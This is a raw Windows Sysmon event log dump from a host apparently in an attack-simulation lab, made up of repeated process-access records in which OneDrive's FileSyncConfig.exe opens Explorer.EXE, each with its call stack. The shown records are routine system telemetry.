14:58:28.865{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fe5|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.865{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fe5|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.865{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fe5|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e 10341000x800000000000000079907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.865{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fe5|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e 10341000x800000000000000079906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.865{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fa1|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fa1|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fa1|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e 10341000x800000000000000079903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10fa1|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e 10341000x800000000000000079902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000079900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e 10341000x800000000000000079899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e 10341000x800000000000000079898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\SHELL32.dll+128d40(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x800000000000000079897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d32(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e 10341000x800000000000000079896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.864{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+128d32(wow64)|C:\Windows\System32\SHELL32.dll+1924cf(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+9edb|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10d85|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10f69|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1191e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013